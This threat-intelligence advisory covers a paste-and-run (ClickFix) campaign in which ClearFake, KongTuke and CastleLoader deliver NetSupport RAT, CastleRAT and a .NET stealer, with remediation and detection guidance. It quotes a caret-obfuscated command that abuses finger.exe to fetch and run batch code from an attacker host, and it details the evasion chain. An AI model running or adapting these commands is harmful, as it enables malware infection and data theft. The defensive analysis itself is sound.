ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run Delivery of NetSupport RAT, CastleRAT, and a .NET Stealer

ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run (TL-2026-2589), also tracked as CastleBot, is a high-severity malware campaign, first published 2026-09-20. It is attributed to GrayBravo with medium confidence, affects Microsoft Windows (cmd.exe / PowerShell / finger.exe execution, maps to 17 MITRE ATT&CK techniques (T1027, T1027.007, T1036), and is covered by 9 detection rules and 25 indicators of compromise.

Key facts for TL-2026-2589

Threat ID
TL-2026-2589
Also known as
CastleBot
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
2026-09-20
Last reviewed
2026-09-20
Attribution
GrayBravo
Attribution confidence
MEDIUM
Motivation
FINANCIAL
Target sectors
government administration, logistics, hospitality
Target regions
North America, Europe
Detection rules
9
Indicators of compromise
25

Malware and tooling in ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run

Malware and tooling: CASTLELOADER, ClearFake, KongTuke, NetSupportManager RAT, NightshadeC2 (Windows), SectopRAT, WarmCookie, unidentified .NET-based information stealer, Matanbuchus, finger.exe, pythonw.exe

Red Canary's June 2026 telemetry shows the ClearFake fake-CAPTCHA drive-by cluster holding the #1 threat rank for a third consecutive month while driving a broader paste-and-run (ClickFix) surge across the unrelated KongTuke WordPress traffic-distribution system and the June debut (#5) of CastleLoader, a TAG-150/GrayBravo malware-as-a-service loader that uses caret obfuscation, a Bring-Your-Own-Interpreter Python chain, and triple-layer encoding to deliver NetSupport Manager RAT, CastleRAT, and an unidentified .NET stealer.

How ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run works

Three independently tracked activity clusters converged on the same social-engineering primitive in June 2026: tricking a user into pasting and executing an attacker-supplied command themselves ("ClickFix" / "paste-and-run", MITRE ATT&CK T1204.004). ClearFake, an activity cluster that injects JavaScript into compromised legitimate websites and displays fake CAPTCHA verification overlays, has held the #1 spot in Red Canary's monthly threat rankings for three consecutive months; parallel public reporting describes ClearFake's newest iteration abusing blockchain smart contracts ("EtherHiding") to host and rotate its command infrastructure in a takedown-resistant way, and using WebDAV to retrieve a disguised library once the victim executes the pasted command.

The same paste-and-run mechanic drove a June 2026 volume spike (last matched in November 2025) in KongTuke, a traffic-distribution system tracked since 2024 (aka 404 TDS, Chaya_002, LandUpdate808, TAG-124) that compromises WordPress sites — largely via administrator credentials harvested by infostealers such as Atomic Stealer and Vidar — and serves fake browser-update or CAPTCHA landing pages that instruct victims to run an obfuscated `curl`-based command reaching out to a `.top` domain (observed pattern: `/c start "" /min cmd /v:on /k "set x=where c*u*r*l.e?e..."`). KongTuke has separately been linked to Rhysida and Interlock ransomware follow-on activity.

CastleLoader, active since early 2025 and also tracked as CastleBot, made its first appearance on Red Canary's top-10 list at #5 in June 2026. It is operated as malware-as-a-service by the threat collective tracked as TAG-150 (rebranded GrayBravo in later reporting), which runs a multi-tiered C2 architecture (Tier 1 victim-facing servers; Tier 2 VPS relays over RDP/3389; Tier 3 split between VPS nodes sharing TLS certificates and Russian residential IP space with Tox-based coordination; Tier 4 UDP backup infrastructure) supporting CastleLoader alongside CastleRAT, SecTopRAT, and WarmCookie. Reported CastleLoader lure fronts include the BackgroundFix campaign (fake AI background-removal tools at ai-scan[.]digital and bg-transparency[.]online, April 2026), a May 2026 job-platform impersonation wave using typosquatted LinkedIn/Indeed domains (linkedall[.]org, golinked[.]net, indeed-jobs[.]net) driven by Google Ads to fake Cloudflare Turnstile pages, and four distinct GrayBravo-operated clusters spoofing freight-matching platforms (logistics), Booking.com (travel/hospitality, delivering CastleLoader and Matanbuchus 3.0), Steam-Community dead-drop infrastructure (delivering CastleRAT), and fake Zabbix/RVTools software updates (delivering NetSupport RAT).

CastleLoader's June 2026 execution chain begins with a caret-obfuscated paste-and-run command (`%COMSPEC% /k s^t^a^r^t "" /min for /f "skip=8 delims=" %h in ('f^^i^^n^^g^^e^^r nrLeDHDESi@cheeshomireciple[.]com') do call %h & exit`) that abuses the legacy `finger.exe` utility to pull batch instructions from an attacker daemon over TCP/79. Those instructions download a portable Python distribution disguised as a PDF, extract it with `tar.exe` (a Bring-Your-Own-Interpreter technique that avoids depending on a pre-installed interpreter), and rename the interpreter to a random 12-18 digit filename (e.g. `8780254714083.exe`). A retrieved Python script applies triple-layer encoding (Base64, zlib, UTF-32) with Cyrillic character substitution before RC4-decrypting the embedded CastleLoader payload, which is reflectively loaded and process-injected into the Python host process. Independent malware analysis of the same family documents a five-stage chain (SEO-poisoned/GitHub lure surface → clipboard/finger payload retrieval → DJB2-hashed shellcode stager fetching `/service/download/*` payloads over HTTP with a Googlebot user agent → a PE loader that splices `LDR_DATA_TABLE_ENTRY`/`LDR_DDAG_NODE` structures to appear as a legitimately loaded module and defeats Windows 11 24H2+ memory-integrity hooking via `NtManageHotPatch` → a ChaCha20-encrypted core backdoor that enumerates the host and polls `/service/tasks` for one of nine task types including EXE, DLL-by-ordinal, PE injection, PowerShell, batch, and MSI execution). CastleLoader also performs `cpuid`-based anti-analysis to detect VMware, VirtualBox, and Parallels, and captures screenshots via a GDI `BitBlt` pipeline.

CastleLoader's confirmed June 2026 payloads are NetSupport Manager RAT (a legitimate remote-support tool, ranked #7-tied in Red Canary's June list, repurposed as a trojan), CastleRAT (TAG-150's own RAT, shipped in a lightweight Python variant and a feature-rich C variant that adds keylogging, clipboard theft, screen/webcam/microphone capture, browser-session hijacking, and a UAC-bypass chain abusing the Appinfo service; both variants use RC4-encrypted custom protocols and query ip-api[.]com for victim geolocation), and an as-yet-unnamed .NET-based information stealer. ClearFake and KongTuke remain independently tracked, unattributed activity clusters; only the CastleLoader/CastleRAT thread carries a named-actor linkage (TAG-150/GrayBravo), assessed with medium confidence given the group's still-evolving public naming and the absence of confirmed underground MaaS advertisements.

MITRE ATT&CK techniques used in TL-2026-2589

Defense Evasion

T1027 Obfuscated Files or Information; T1027.007 Dynamic API Resolution; T1036 Masquerading; T1055.012 Process Hollowing; T1140 Deobfuscate/Decode Files or Information; T1497.001 System Checks; T1620 Reflective Code Loading

Execution

T1059.001 PowerShell; T1059.003 Windows Command Shell; T1204.004 Malicious Copy and Paste

Command and Control

T1071.001 Web Protocols; T1219 Remote Access Tools; T1573.001 Symmetric Cryptography

Discovery

T1082 System Information Discovery

Collection

T1113 Screen Capture

Initial Access

T1566.002 Spearphishing Link

Resource Development

T1608.006 SEO Poisoning

Affected products and versions in ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run

  • Microsoft — Windows (cmd.exe / PowerShell / finger.exe execution surface)
    Vulnerable versions: all supported Windows versions exposing cmd.exe, PowerShell, and the legacy finger.exe client
  • WordPress — WordPress CMS (compromised via stolen/purchased administrator credentials, not a software vulnerability)
    Vulnerable versions: N/A - credential-based site compromise, not version-specific

Remediation for ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run

Immediate actions

  • Deploy a detection analytic for caret-obfuscated cmd.exe command lines, e.g. process==(cmd.exe) && command_includes('^+[a-z]'{4,}), with exclusions for legitimate use of ^ as an escape character
  • Alert on explorer.exe -> cmd.exe -> finger.exe process chains and on finger.exe invoked with a user@domain argument; block or tightly restrict outbound TCP/79 (finger), which has no legitimate business use in most enterprise environments
  • Block the identified lure and C2 domains/IPs (captcha-checkpoint[.]top, ai-scan[.]digital, bg-transparency[.]online, mirtona[.]com, linkedall[.]org, golinked[.]net, indeed-jobs[.]net, cheeshomireciple[.]com, and the CastleLoader/CastleRAT C2 infrastructure) at DNS, proxy, and firewall layers
  • Hunt for Python or pythonw.exe execution from %APPDATA%/%TEMP% paths, especially interpreters with random 12-18 digit filenames, following a tar.exe extraction event

Workarounds

  • Disable or GPO-restrict the Windows Run dialog (Win+R) for user populations at elevated exposure to ClickFix-style lures, since the technique relies on the victim pasting a command into Run or a terminal

Longer-term hardening

  • Deliver user-awareness training specifically addressing ClickFix/paste-and-run fake-CAPTCHA and fake-verification lures, since the technique bypasses file- and email-based controls entirely by having the victim execute the payload themselves
  • Use application control (WDAC/AppLocker) to restrict execution of finger.exe, tar.exe, and portable/embeddable Python distributions from user-writable directories
  • Monitor WordPress administrator accounts for credential exposure in infostealer log marketplaces, and enforce MFA plus plugin/theme integrity monitoring on internet-facing WordPress sites to reduce KongTuke's initial-access path
  • Treat NetSupport Manager and other legitimate remote-access tools as monitored/managed software; alert on their installation or execution outside of IT-authorized deployment channels

Timeline of ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run

  • KongTuke traffic-distribution system first publicly reported, using compromised WordPress sites to redirect visitors toward malware payloads.
  • CastleLoader (aka CastleBot) malware-as-a-service loader becomes active; TAG-150 begins operating multi-tiered C2 infrastructure supporting CastleLoader, SecTopRAT, and WarmCookie.
  • TAG-150 begins development of the CastleRAT C-variant client, later adding Steam Community dead-drop resolver and advanced stealing capabilities.
  • CastleRAT Python variant first identified in the wild, alongside the C variant identified the prior month; TAG-150 adds WebSocket C2 encapsulation.
  • Public reporting (The Hacker News, citing Recorded Future) details TAG-150's development of CastleRAT in both Python and C, expanding CastleLoader operations.
  • Security researchers report KongTuke actors exploiting compromised WordPress sites/themes to power next-generation ClickFix phishing attacks.
  • Public reporting identifies four distinct GrayBravo (formerly TAG-150)-operated threat clusters distributing CastleLoader via logistics-platform, Booking.com, Steam Community, and fake-software-update lures.
  • Cisco Talos identifies unusual remote-library execution consistent with ClearFake/EtherHiding activity at a Ukrainian government organization.
  • CastleLoader's BackgroundFix campaign observed using fake AI background-removal websites (ai-scan[.]digital, bg-transparency[.]online) with fake CAPTCHA paste-and-run lures.
  • ClickFix variant impersonating LinkedIn and Indeed via typosquatted domains (linkedall[.]org, golinked[.]net, indeed-jobs[.]net) and Google Ads-driven fake Cloudflare Turnstile pages observed delivering CastleLoader.
  • Red Canary's June 2026 telemetry shows ClearFake holding the #1 threat rank for a third consecutive month, a KongTuke paste-and-run volume spike matching November 2025 levels, CastleLoader debuting at #5, and NetSupport Manager tied at #7.
  • Red Canary publishes "Intelligence Insights: July 2026," documenting the June 2026 ClearFake/KongTuke/CastleLoader paste-and-run activity and CastleLoader's caret-obfuscated, BYOI, triple-layer-encoded delivery chain.

Sources cited for ClearFake Drive-By Cluster Fuels CastleLoader Paste-and-Run

More in malware

Detection coverage for TL-2026-2589

As of 2026-09-20, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2589 across Splunk SPL, Microsoft KQL and Sigma, covering 25 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

Community OSINT corroboration for TL-2026-2589

2 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Latest Threats